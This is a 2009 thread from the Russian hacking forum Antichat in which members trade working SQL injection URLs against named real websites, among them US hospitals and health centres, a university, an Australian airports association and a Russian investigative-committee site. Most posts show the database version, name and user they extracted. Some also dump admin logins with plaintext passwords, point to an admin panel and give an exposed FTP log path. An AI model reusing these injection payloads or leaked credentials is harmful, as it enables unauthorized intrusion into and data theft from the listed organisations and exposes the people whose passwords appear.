ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8681  
Старый 01.04.2009, 21:17
KaMuKaDzE
Новичок
Регистрация: 13.03.2009
Сообщений: 1
Провел на форуме:
10500

Репутация: 10
По умолчанию

PHP код:
http://www.zora.ru/?a=show&id=-147+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11-- 
version / 4.0.27-standard-log
database / zora
user / zora@localhost



PHP код:
http://www.unitedparts.ru/catalog.php?id=2+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4-- 
version / 5.0.67-log
database / u44238_3
user / u44238@10.10.223.208
 
Ответить с цитированием

  #8682  
Старый 01.04.2009, 22:57
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://blackhillslots.com/news/?newsid=-5+UNION+SELECT+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8

Database Version: 5.0.45
Database name: blackhillslotsdb
User name: blackhillslots@localhost


http://midwestalarm.com/news/?newsid=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8

Database Version: 5.0.45
Database name: midwestalarmdb
User name: midwestalarm@localhost



http://klockwerkscycles.com/news.php?newsid=-194+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7

Database Version: 5.0.45-log
Database name: klockwerksdb
User name: klockwerks@localhost
 
Ответить с цитированием

  #8683  
Старый 02.04.2009, 00:10
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

Код:
http://studsovet.wl.dvgu.ru/index.php?id=-375+union+select+concat_ws(0x3a,user_login,user_pass,user_nicename,user_url,user_status)+from+wp_vi_users--
database : 5.0.67

tables : wp_vi_users
log: admin
pass: admin
 
Ответить с цитированием

  #8684  
Старый 02.04.2009, 00:14
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
Провел на форуме:
2816163

Репутация: 158
Smile

Australian Airports Association (pr5)
хакиры отакуют аэропорты (=
Код:
http://www.aaal.com.au/category.php?id=18+AND+ASCII(SUBSTRING((select+y()),1,1))>x/*
y1=version
y2=database
y3=user

x1=52,46,49,46,49,49,45,68,101,98,105,97,110,95,52,1 15,97,114,103,100,55
x2=97,97,97,108
x3=97,105,114,112,111,114,116,115,64,108,111,99,97,1 08,104,111,115,116


version() - 4.1.11-Debian_4sargd7
database() - aaal
user() - airports@localhost
---------------------------------------------------------------------------------------------------------------

Последний раз редактировалось fker; 02.04.2009 в 00:17.. Причина: боянчег запостил случайно...
 
Ответить с цитированием

1 april
  #8685  
Старый 02.04.2009, 00:33
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию 1 april

http://www.speedcarseries.com/news/index.php?newsid=-101+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11

Database Version: 5.0.41-community
Database name: speedcar
User name: speedcar@localhost




http://dtsf.com/news/index.php?newsid=-302+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6


Database Version: 5.0.45
Database name: dtsfdb
User name: dtsf@localhost
admin:incognito




http://signaturehomesllc.com/news/index.php?newsid=-20+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9,10

Database Version: 5.0.51a-3ubuntu5.4
Database name: signaturehomes
User name: signaturehomes@localhost



http://sfseminary.edu/news/index.php?newsid=-198+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8

Database Version: 5.0.45
Database name: sfseminary_edu
User name: sfseminary@localhost

Jokester они сменили базу и движок сайта, но скуля есть...не знаю если это можно считать бояном



http://truth-4-youth.net/news/index.php?newsid=-15+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9


Database Version: 4.1.22
Database name: truth4youthdb
User name: truth4youth@localhost



http://brookingshealth.org/news/?newsid=-214+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),useR()),6,7,8,9,10,11--

Database Version: 5.0.45
Database name: brookingshealthdb
User name: brookingshealth@localhost


http://huronregional.org/news/index.php?newsid=-401+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8,9,10,11,12,13&id=58

Database Version: 5.0.45
Database name: huronregionaldb
User name: huronregional@localhost



http://www.luvernecommunityhospital.org/news.php?newsid=-218+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8

Database Version: 5.0.45
Database name: sanfordluvernedb_new
User name: newsanford@localhost



http://nwiowahealthcenter.org/news.php?newsid=-75+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6


Database Version: 5.0.45
Database name: northwestiowadb
User name: northwestiowa@localhost


http://prairielakes.com/news/index.php?newsid=-417+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8,9,10,11--


Database Version: 5.0.45
Database name: prairielakesdb
User name: prairielakes@localhost



http://urgentcareemr.com/news/index.php?newsid=-19+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9--


Database Version: 5.0.45
Database name: docutapdb
User name: docutap@localhost



http://www.sfsurgical.com/news/index.php?newsid=-5+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7,8,9



Database Version: 5.0.45
Database name: sfsurgicaldb
User name: sfsurgical@localhost


http://mywellnessadvantage.com/news/index.php?id=&newsid=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7,8,9


Database Version: 5.0.45
Database name: westernhealthdb
User name: westernhealth@localhost




http://www.welcoa.org/news.php?entryid=-489+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8,9,10,11,12,13,14,15


Database Version: 5.0.45
Database name: welcoadb
User name: welcoa@localhost
 
Ответить с цитированием

  #8686  
Старый 02.04.2009, 07:26
HIVER
Познающий
Регистрация: 28.10.2008
Сообщений: 43
Провел на форуме:
117557

Репутация: 125
По умолчанию

Код:
http://web-book.ru/index.php?page=details&book=-1+union+select+1,2,3,4,CONCAT_WS(0x2C,USER(),DATABASE(),VERSION()),6,7,8,9,10,11,12
dbuser: dbu_tyre1_1@192.168.7.19
dbname: db_tyre1_1
Version: 4.1.22-log
 
Ответить с цитированием

  #8687  
Старый 02.04.2009, 12:59
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

обед
Цитата:
http://ist.stmary.edu/alumni.php?alumniID=49+union+select+1,user(),3,4,5 ,6,7,8+limit+1,1/*
User:root
Version:5.0.27-community-nt


[ist.stmary.edu Не боян]

ps: для тех, кто будет искать пути ;-)
Цитата:
http://ist.stmary.edu/news/images/smilies/WS_FTP.LOG
=======================================
Цитата:
http://www.studentservices.aero.und.edu/f4_Jobs%20and%20Scholarships/view_job.php?JobID=1311+order+by+32/*
Version: 5.0.22
User: studentservices@mozart.aero.und.edu
Dbname: studentservices

table users:
asn:asn
salvesen:jubalon
henryb:henryb
amy:jake
kim:ecolab
tbarrett:tbear

Цитата:
http://www.studentservices.aero.und.edu/admin/index.php

Последний раз редактировалось $n@ke; 02.04.2009 в 13:08..
 
Ответить с цитированием

  #8688  
Старый 02.04.2009, 13:05
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

directrix.ru ТиЦ 2000 PR 3
PHP код:
http://directrix.ru/cat?tag=331212212121231+union+select+1,2,concat_ws(0x3A,user(),@@version,database()),4,5,6,7--+ 
user(): wwditrix@localhost
version(): 5.0.51a-17vc-log
database(): directrix
 
Ответить с цитированием

  #8689  
Старый 02.04.2009, 13:52
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

sql-blind

Код:
http://www.puppets.ru/index.php?id=85'+and+ascii(substring(version(),1,1))=53--+
database: 5.0.51
 
Ответить с цитированием

  #8690  
Старый 02.04.2009, 16:27
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

"Официальный сайт следственного управления Следственного комитета..."

Код:
http://www.skprok.tver.ru/news/?new_id=110+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ